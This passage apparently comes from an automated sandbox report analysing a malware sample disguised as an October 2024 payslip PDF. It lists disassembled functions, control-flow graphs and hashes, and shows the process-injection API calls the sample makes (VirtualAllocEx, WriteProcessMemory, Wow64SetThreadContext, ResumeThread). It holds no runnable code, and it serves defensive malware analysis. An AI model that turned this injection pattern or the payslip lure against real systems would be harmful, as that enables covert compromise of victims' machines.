                                              control_flow_graph 481 274af11-274af1e 482 274af24-274af2f 481->482 483 274af20-274af23 481->483 484 274af31-274af3e call 2749e80 482->484 485 274af5b-274af5f 482->485 483->482 490 274af54 484->490 491 274af40 484->491 487 274af61-274af6b 485->487 488 274af73-274afb4 485->488 487->488 494 274afb6-274afbe 488->494 495 274afc1-274afcf 488->495 490->485 541 274af46 call 274b5b8 491->541 542 274af46 call 274b5a8 491->542 494->495 496 274afd1-274afd6 495->496 497 274aff3-274aff5 495->497 499 274afe1 496->499 500 274afd8-274afdf call 2749e8c 496->500 502 274aff8-274afff 497->502 498 274af4c-274af4e 498->490 501 274b090-274b10c 498->501 504 274afe3-274aff1 499->504 500->504 533 274b10e-274b136 501->533 534 274b138-274b150 501->534 505 274b001-274b009 502->505 506 274b00c-274b013 502->506 504->502 505->506 508 274b015-274b01d 506->508 509 274b020-274b029 call 2749e9c 506->509 508->509 514 274b036-274b03b 509->514 515 274b02b-274b033 509->515 516 274b03d-274b044 514->516 517 274b059-274b066 514->517 515->514 516->517 519 274b046-274b056 call 2749eac call 2749ebc 516->519 524 274b068-274b086 517->524 525 274b089-274b08f 517->525 519->517 524->525 533->534 536 274b152-274b155 534->536 537 274b158-274b183 GetModuleHandleW 534->537 536->537 538 274b185-274b18b 537->538 539 274b18c-274b1a0 537->539 538->539 541->498 542->498
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 823e8becc1bbd8908c1e81c9796fa2ba77363c34c43b370e3518d239ddf47a8d
                                              • Instruction ID: 02225a73b1c5c46af2636a4f4f50f69f427c48c172a388bf4350b630da15ebe7
                                              • Opcode Fuzzy Hash: 823e8becc1bbd8908c1e81c9796fa2ba77363c34c43b370e3518d239ddf47a8d
                                              • Instruction Fuzzy Hash: E58179B0A00B458FD724DF2AD54479ABBF5FF89304F008A2ED49AD7A51DB35E809CB90
                                              Function 0274590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 543 274590c-27459d9 CreateActCtxA 545 27459e2-2745a3c 543->545 546 27459db-27459e1 543->546 553 2745a3e-2745a41 545->553 554 2745a4b-2745a4f 545->554 546->545 553->554 555 2745a60 554->555 556 2745a51-2745a5d 554->556 558 2745a61 555->558 556->555 558->558
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 027459C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: fba65f064b3ccc331e63571b037eb945a243b034e52d96b7bea7386f8660dd1f
                                              • Instruction ID: 8d7246cbfb74d56402582c5743b3d22382751f528c77667cdd7d26881db6b9f0
                                              • Opcode Fuzzy Hash: fba65f064b3ccc331e63571b037eb945a243b034e52d96b7bea7386f8660dd1f
                                              • Instruction Fuzzy Hash: 0B41D1B0D00719CFDB24CFA9C884B9EBBF1BF49704F60806AD409AB255DB75694ACF91
                                              Function 027444D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 559 27444d4-27459d9 CreateActCtxA 562 27459e2-2745a3c 559->562 563 27459db-27459e1 559->563 570 2745a3e-2745a41 562->570 571 2745a4b-2745a4f 562->571 563->562 570->571 572 2745a60 571->572 573 2745a51-2745a5d 571->573 575 2745a61 572->575 573->572 575->575
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 027459C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 50b21c8ef105d1538e14ca071c759690d829bec5c41c0f7f3f32d1c779403cda
                                              • Instruction ID: ff0ef54c0df74e2d7072fd160b4c67f827ca7cbc72e219db617c418502b94c79
                                              • Opcode Fuzzy Hash: 50b21c8ef105d1538e14ca071c759690d829bec5c41c0f7f3f32d1c779403cda
                                              • Instruction Fuzzy Hash: 5441E0B0C00619CBDB24CFA9C884B9EBBF5BF49304F60806AD408AB251DB756949CF91
                                              Function 06D19450 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 576 6d19450-6d194a6 579 6d194b6-6d194f5 WriteProcessMemory 576->579 580 6d194a8-6d194b4 576->580 582 6d194f7-6d194fd 579->582 583 6d194fe-6d1952e 579->583 580->579 582->583
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D194E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 5ed0d713ae091c30d368502d74871bd31311933db5f3fe2020a29d4f407d8b44
                                              • Instruction ID: cef013137f3979ad525d3d4db5d0775599059e7ac3c1e4933763bed7a53ba481
                                              • Opcode Fuzzy Hash: 5ed0d713ae091c30d368502d74871bd31311933db5f3fe2020a29d4f407d8b44
                                              • Instruction Fuzzy Hash: 21215AB59003499FCB10CFA9D885BEEBFF5FF48310F10842AE919AB240C7789940CBA5
                                              Function 0274D518 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 587 274d518-274d51c 588 274d562-274d5b4 DuplicateHandle 587->588 589 274d51e-274d55f 587->589 590 274d5b6-274d5bc 588->590 591 274d5bd-274d5da 588->591 589->588 590->591
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0274D4E6,?,?,?,?,?), ref: 0274D5A7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 2f2537f53e66de0150b1e6bd55bec0f6ed83d73d69b7afbbb2e6cc95dcfd2732
                                              • Instruction ID: aeb100b9a24e0a8655e8a15664dea93a1e0f5857bdefba2558ab3a225ec63906
                                              • Opcode Fuzzy Hash: 2f2537f53e66de0150b1e6bd55bec0f6ed83d73d69b7afbbb2e6cc95dcfd2732
                                              • Instruction Fuzzy Hash: 702157B58002599FDB20CFA9D944AEEFFF4EF49324F24811AE954A7350C378A941CFA1
                                              Function 06D19458 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 595 6d19458-6d194a6 597 6d194b6-6d194f5 WriteProcessMemory 595->597 598 6d194a8-6d194b4 595->598 600 6d194f7-6d194fd 597->600 601 6d194fe-6d1952e 597->601 598->597 600->601
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D194E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: ea3f44f6436b59f1699b65c591e042f4a7d646ffa0ae1e5ef8ef3c1c123733e4
                                              • Instruction ID: 5c71ddee0a1ede1ed1aad4da93950be23282cfb77a3f40c576e346dc81b73bca
                                              • Opcode Fuzzy Hash: ea3f44f6436b59f1699b65c591e042f4a7d646ffa0ae1e5ef8ef3c1c123733e4
                                              • Instruction Fuzzy Hash: F92119B5D003499FCB10DFAAC985BEEBBF5FF48310F108429E919A7250D7789944CBA5
                                              Function 06D19979 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 605 6d19979-6d19a0d ReadProcessMemory 609 6d19a16-6d19a46 605->609 610 6d19a0f-6d19a15 605->610 610->609
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D19A00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 98c42a633460dd68dbf4185d9fe7ee6ddc632fc1b359ed2a1921d314e8c3b86a
                                              • Instruction ID: 2efd59dd261d5c7fbc3f84769e7af854e3453a98e5397420d5347fc16e8bfd2a
                                              • Opcode Fuzzy Hash: 98c42a633460dd68dbf4185d9fe7ee6ddc632fc1b359ed2a1921d314e8c3b86a
                                              • Instruction Fuzzy Hash: 802139B6C003499FCB10DFAAD841AEEFBF5FF48320F10842AE559A7250D7789945CBA1
                                              Function 06D192B9 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 614 6d192b9-6d1930b 616 6d1931b-6d1934b Wow64SetThreadContext 614->616 617 6d1930d-6d19319 614->617 619 6d19354-6d19384 616->619 620 6d1934d-6d19353 616->620 617->616 620->619
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1933E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: c24a2387e8465750c998e433e8a869357f731b576710b89a49909879919d4175
                                              • Instruction ID: 55371b15ec67bf4cc1541806478ffe2d7ef2cc591e52cf729c56ea2e1d3574d5
                                              • Opcode Fuzzy Hash: c24a2387e8465750c998e433e8a869357f731b576710b89a49909879919d4175
                                              • Instruction Fuzzy Hash: C4214CB5D002098FDB10DFAAC4857EEBBF5EF88314F14842AD519AB240C7789945CFA1
                                              Function 0274B580 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 624 274b580-274d5b4 DuplicateHandle 627 274d5b6-274d5bc 624->627 628 274d5bd-274d5da 624->628 627->628
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0274D4E6,?,?,?,?,?), ref: 0274D5A7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 194fa13e2b81f5f8deece94805c96416b79aa27e7fb7f07d3244b609296a76b9
                                              • Instruction ID: f760548999e09b752f3f75f41fb80e785ed8665bf15edd84b399ec2a5ca4e107
                                              • Opcode Fuzzy Hash: 194fa13e2b81f5f8deece94805c96416b79aa27e7fb7f07d3244b609296a76b9
                                              • Instruction Fuzzy Hash: EB21E6B59002589FDB10CF9AD584AEEFBF5FB48314F14801AE954B7310D778A944CFA5
                                              Function 06D192C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1933E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 645caa46cd4b114a4505dcfd33ecd0f8a2f071f0de78c83e5d1d368ecab84f30
                                              • Instruction ID: a82adae517c835b92c20907a601f44b7154759e838eec99c82274b5e6b53e984
                                              • Opcode Fuzzy Hash: 645caa46cd4b114a4505dcfd33ecd0f8a2f071f0de78c83e5d1d368ecab84f30
                                              • Instruction Fuzzy Hash: 9C2135B1D003099FDB10DFAAC4857EEBBF4EF48324F14842AD519AB240CB78A945CFA1
                                              Function 06D19980 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D19A00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: d354a93dc2d3d823a590e965d267127f0e172eac254fb0b93dbb9e8c4aad0054
                                              • Instruction ID: 62a41732d6f179ab2f6e91f9eee481e908072e17757dfef43584b9f6f87da672
                                              • Opcode Fuzzy Hash: d354a93dc2d3d823a590e965d267127f0e172eac254fb0b93dbb9e8c4aad0054
                                              • Instruction Fuzzy Hash: D52118B1C003499FCB10DFAAC885AEEFBF5FF48310F54842AE959A7250D7789944CBA1
                                              Function 06D19390 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D19406
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 84af2c169b540a9907f06b54a28c1a0f165b6e9b1c33aab42494a7a992f4639f
                                              • Instruction ID: 8af72fa16ad208c51df3959576d7e3d4f4ee3a02e2a5cad58fef05c322dd8a98
                                              • Opcode Fuzzy Hash: 84af2c169b540a9907f06b54a28c1a0f165b6e9b1c33aab42494a7a992f4639f
                                              • Instruction Fuzzy Hash: CE116A768002499FCB20DFAAD845AEFBFF5EF48310F148419E519A7250C779A940CFA1
                                              Function 06D19398 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D19406
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: f2cdb52cf22c5237814dae4012dc6cfe53aac5a47ba93c6df20410862f53557b
                                              • Instruction ID: 03efb2657b360d926037ec2b10a7e6f64daffab00c17980d82945ae26b4882cf
                                              • Opcode Fuzzy Hash: f2cdb52cf22c5237814dae4012dc6cfe53aac5a47ba93c6df20410862f53557b
                                              • Instruction Fuzzy Hash: D21137758002499FCB10DFAAC845AEFBFF5EF48310F248419E519AB250C779A940CFA5
                                              Function 06D19209 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 9b2f48e256415bbc04617c3836c0c5065b140a162ca91ad742be60988ab26334
                                              • Instruction ID: 49a7612df0bc16b0144c265a50e89d79f6164fdcd785faaa8e41746df5741d6d
                                              • Opcode Fuzzy Hash: 9b2f48e256415bbc04617c3836c0c5065b140a162ca91ad742be60988ab26334
                                              • Instruction Fuzzy Hash: 7D1158B5D002488FDB20DFAAD4457EEFBF5EF88324F248419D01AAB250C7789944CFA1
                                              Function 06D19210 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 2900e5ef04c8ea67188f82b930592b3ba1d499b49fff0324e0a0f58bc939f4f2
                                              • Instruction ID: fb6f62234815402cd243edd756c5c870ed57d1aeec0b06ee1401b06e5954e985
                                              • Opcode Fuzzy Hash: 2900e5ef04c8ea67188f82b930592b3ba1d499b49fff0324e0a0f58bc939f4f2
                                              • Instruction Fuzzy Hash: 35113AB1D003488FCB20DFAAD4457EEFBF5EF88314F248419D519A7250CB79A944CBA1
                                              Function 0274B110 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0274B176
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: d2202746137d0a42e92ad94a6a0699889f0838167589734598732b6c6fbb2fa7
                                              • Instruction ID: 0981a4b5a7a7adcafc8123a8fb08c64ec64de3e9860684734b4b5713eb17e59c
                                              • Opcode Fuzzy Hash: d2202746137d0a42e92ad94a6a0699889f0838167589734598732b6c6fbb2fa7
                                              • Instruction Fuzzy Hash: 1211DFB6C002498FCB10DF9AC844A9EFBF5EF89214F14846AD429A7210D379A945CFA1
                                              Function 06D1C1D8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D1C23D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 9eb45f81e293cba7ecbe3d10d2b8481545260b61eb123bb207fee7914cd3b9c4
                                              • Instruction ID: 17f11a790257129b4516b34919f6e90a9d2c79343b6a82adb69bf766e816c24f
                                              • Opcode Fuzzy Hash: 9eb45f81e293cba7ecbe3d10d2b8481545260b61eb123bb207fee7914cd3b9c4
                                              • Instruction Fuzzy Hash: 3F11D6B58003499FDB20DF99D845BDEBFF8EB48314F108459E558A7650C379A944CFA1
                                              Function 06D12958 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D1C23D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: aee88d3708d4e82da90944e7ffc1dd349de66fe78b5224490431f4caf8612295
                                              • Instruction ID: 76070f1d30fa8d88d99b8b11f5d4b3407c35ff7d01fc36e4aa09a3a656f7ff14
                                              • Opcode Fuzzy Hash: aee88d3708d4e82da90944e7ffc1dd349de66fe78b5224490431f4caf8612295
                                              • Instruction Fuzzy Hash: AF1103B58003489FDB20DF9AD845BDEBFF8EB48314F108459E958A7210D3B9A944CFE1
                                              Function 054D7900 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,054D77B9,?,?), ref: 054D7960
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044494192.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_54d0000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 463660675d86df92325d0223daac719beed06b3320940e5dfcad886212c8aad1
                                              • Instruction ID: aff7f0e2a5c7c384b96a731d434a7a2511c1607fc887a1dd86ffea84c14a7bf4
                                              • Opcode Fuzzy Hash: 463660675d86df92325d0223daac719beed06b3320940e5dfcad886212c8aad1
                                              • Instruction Fuzzy Hash: BD1116B68003499FDB20DF9AC445BDEFBF4EF48320F24845AD558A7241D378A584CBA5
                                              Function 054D7004 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,054D77B9,?,?), ref: 054D7960
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044494192.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_54d0000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: ab772f3931501a970cbf7111f9e5c1a871e544622f142187db50326fc1fdcfed
                                              • Instruction ID: 107ae41ce4b536395a5097f2d951aae540b0e0337c6ada41150d472371cca961
                                              • Opcode Fuzzy Hash: ab772f3931501a970cbf7111f9e5c1a871e544622f142187db50326fc1fdcfed
                                              • Instruction Fuzzy Hash: BD1122B68003498FDB20DF9AC445BEEFBF4EB48320F20845AD958A7341D378A944CFA5
                                              Function 054D708C Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,054D77B9,?,?), ref: 054D7960
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044494192.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_54d0000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: bdee06f6efafb71da25d112b424522f35a4ce1faf06ee2096cb54df8924303f3
                                              • Instruction ID: 8a98277b43192cec632c4976f1d4b7c3aa0197048d2cd6fbc62a45cf2671ce40
                                              • Opcode Fuzzy Hash: bdee06f6efafb71da25d112b424522f35a4ce1faf06ee2096cb54df8924303f3
                                              • Instruction Fuzzy Hash: 0C1122B68003498FDB20DF9AC445BEEFBF4EB48320F20845AD958A7340D378A944CFA5
                                              Function 00F3D1FC Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032913162.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_f3d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0009e6fe6c5220d5754fb7a8933bdf3ef84d937bd789fba36800ae855024fd20
                                              • Instruction ID: 6abd649f8fa3ce37f4ac855e98304bd01b9b8ba3fc67765acdbfeccbce9aab53
                                              • Opcode Fuzzy Hash: 0009e6fe6c5220d5754fb7a8933bdf3ef84d937bd789fba36800ae855024fd20
                                              • Instruction Fuzzy Hash: 6421C172504244DFDB05DF54E9C4B27BF65FB88324F24C569ED090A256C33AD816EBA2
                                              Function 00F4D1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032938344.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_f4d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52ff0f26a36c6f793e6ae9a78e6cb51975e4d4042e8fce8785d027c7f2287319
                                              • Instruction ID: c7363e959ea461e12d844a54a4047f5de738d83101ddb4962fcc693005b234c8
                                              • Opcode Fuzzy Hash: 52ff0f26a36c6f793e6ae9a78e6cb51975e4d4042e8fce8785d027c7f2287319
                                              • Instruction Fuzzy Hash: 8C21F571A04204DFDB05DF14D9C0B26BFA5FB84324F20C66DED094B356C3BAD906EA61
                                              Function 00F4D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032938344.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_f4d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 172910da84919a1c919d8d611f0eaf5f2a7369983b6d5f4115b480316f42f625
                                              • Instruction ID: 1b39ad609888d8bc9653c5632ff2cc13bb4cff755089a5cdc254aadc7a93a7a5
                                              • Opcode Fuzzy Hash: 172910da84919a1c919d8d611f0eaf5f2a7369983b6d5f4115b480316f42f625
                                              • Instruction Fuzzy Hash: 7021F271604204DFCB14DF28D984B26BF65FB88324F20C56DDD0A4B39AC33AD847EA62
                                              Function 00F4D005 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032938344.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_f4d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f625d9857efc939b1d311d165bc969eda4fd58296a23477ebb23d1995eb2d748
                                              • Instruction ID: ad4e0c8574fabc7c9b912607536a948c0248e0787056d9b71bb87811cd187549
                                              • Opcode Fuzzy Hash: f625d9857efc939b1d311d165bc969eda4fd58296a23477ebb23d1995eb2d748
                                              • Instruction Fuzzy Hash: 862192755093C08FCB02CF24D994715BF71EB46324F28C5EAD8498F2A7C33A980ADB62
                                              Function 00F3D1F7 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032913162.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_f3d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
                                              • Instruction ID: 64cc02b6b32c0ce03aabb3255f7916ec7b2c217e6909e3fe487b241d34a20fc4
